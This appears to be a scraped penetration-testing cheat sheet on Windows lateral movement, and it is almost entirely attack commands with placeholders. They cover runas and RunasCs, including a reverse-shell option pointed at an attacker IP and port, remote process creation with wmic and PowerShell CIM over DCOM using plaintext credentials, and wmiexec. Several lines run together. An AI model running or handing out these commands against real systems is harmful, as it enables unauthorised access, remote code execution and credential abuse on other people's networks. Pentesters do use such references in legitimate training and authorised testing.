Lateral Movement
RunAs
runas /user:<USER> <COMMAND, ex. cmd>
# or
Start-Process cmd.exe -Verb runAsImport-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs <USER> <PASS> "cmd /c whoami /all".\RunasCs.exe <USER> <PASS> "cmd.exe -r <IP>:<PORT>"wmic /node:<IP> /user:<USER> /password:<PASS> process call create "<COMMAND>"$credential = New-Object System.Management.Automation.PSCredential 'USER', (ConvertTo-SecureString '<PASS>' -AsPlaintext -Force)
$Session = New-Cimsession -ComputerName <IP> -Credential $credential -SessionOption (New-CimSessionOption -Protocol DCOM)
$command = '<COMMAND>';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};wmiexec <USER>@<IP>PsExec
DCOM
Kerberos Tickets
Last updated